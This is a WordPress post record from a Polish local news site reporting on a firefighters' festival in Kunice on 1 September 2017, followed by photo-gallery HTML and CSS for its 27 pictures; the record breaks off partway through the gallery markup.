{"id":6963,"date":"2017-09-05T14:26:15","date_gmt":"2017-09-05T12:26:15","guid":{"rendered":"http:\/\/moja24.pl\/?p=6963"},"modified":"2019-04-27T02:42:41","modified_gmt":"2019-04-27T00:42:41","slug":"festyn-strazacki-w-kunicach","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/09\/05\/festyn-strazacki-w-kunicach\/","title":{"rendered":"Festyn stra\u017cacki w Kunicach"},"content":{"rendered":"<p><strong>Ostatni dzie\u0144 wakacji nie by\u0142 nudny. Pomimo kapry\u015bnej pogody, na stadionie &#8222;Unii Kunice&#8221; odby\u0142 si\u0119 tego dnia Festyn Stra\u017cacki.<br \/>\n<\/strong><\/p>\n<p>W pi\u0105tek, 1 wrze\u015bnia od godziny 11, na odwiedzaj\u0105cych czeka\u0142y liczne atrakcje. By\u0142o szkolenie obronne oraz \u0107wiczenia z wojskiem. Organizatorzy zapewnili mi\u0119dzy innymi ekspozycj\u0119 czo\u0142gu Leopard 2A5 oraz boj\u00f3wki OSP \u017bary-Kunice, pokaz sprz\u0119tu po\u017carniczego, pokazy ratownictwa, konkursy i zabawy z nagrodami. Dla dzieci by\u0142a darmowa wata cukrowa i popcorn.<\/p>\n\r\n                <style type=\"text\/css\">\r\n                    \r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item1 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-1-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item2 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-2-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item3 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-3-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item4 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-4-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item5 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-5-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item6 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-6-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item7 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-7-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item8 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-8-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item9 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-9-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item10 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-10-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item11 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-11-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item12 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-12-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item13 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-13-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item14 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-14-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item15 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-15-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item16 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-16-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item17 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-17-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item18 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-19-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item19 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-20-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item20 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-21-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item21 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-22-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item22 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-23-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item23 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-24-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item24 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-25-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item25 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-26-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item26 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-28-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f3881a387bd  .td-doubleSlider-2 .td-item27 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-29-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                <\/style>\r\n\r\n                <div id=\"td_uid_1_69f3881a387bd\" class=\"td-slide-on-2-columns\">\r\n                    <div class=\"post_td_gallery\">\r\n                        <div class=\"td-gallery-slide-top\">\r\n                           <div class=\"td-gallery-title\">Festyn Stra\u017cacki w Kunicach - ostatni dzie\u0144 wakacji<\/div>\r\n\r\n                            <div class=\"td-gallery-controls-wrapper\">\r\n                                <div class=\"td-gallery-slide-count\"><span class=\"td-gallery-slide-item-focus\">1<\/span> of 27<\/div>\r\n                                <div class=\"td-gallery-slide-prev-next-but\">\r\n                                    <i class = \"td-icon-left doubleSliderPrevButton\"><\/i>\r\n                                    <i class = \"td-icon-right doubleSliderNextButton\"><\/i>\r\n                                <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                        <div class = \"td-doubleSlider-1 \">\r\n                            <div class = \"td-slider\">\r\n                                \r\n                    <div class = \"td-slide-item td-item1\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-1.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (1)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-1-279x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-1-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-1-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-1.jpg 638w\" sizes=\"(max-width: 279px) 100vw, 279px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item2\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-2.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (2)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-2-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-2-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-2-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-2-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-2-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-2-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-2-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-2.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item3\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-3.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (3)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-3-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-3-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-3-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-3-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-3-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-3-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-3-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-3.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item4\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-4.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (4)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-4-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-4-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-4-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-4-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-4-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-4-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-4-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-4.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item5\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-5.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (5)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-5-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-5-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-5-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-5-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-5-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-5-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-5-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-5.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item6\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-6.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (6)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-6-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-6-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-6-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-6-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-6-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-6-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-6-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-6.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item7\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-7.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (7)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-7-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-7-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-7-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-7-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-7-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-7-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-7-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-7.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item8\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-8.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (8)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-8-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-8-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-8-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-8-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-8-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-8-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-8-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-8.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item9\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-9.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (9)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-9-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-9-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-9-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-9-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-9-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-9-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-9-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-9.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item10\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-10.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (10)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-10-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-10-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-10-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-10-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-10-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-10-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-10-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-10.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item11\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-11.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (11)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-11-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-11-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-11-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-11-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-11-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-11-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-11-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-11.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item12\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-12.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (12)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-12-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-12-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-12-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-12-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-12-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-12-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-12-1068x710.jpg 1068w, 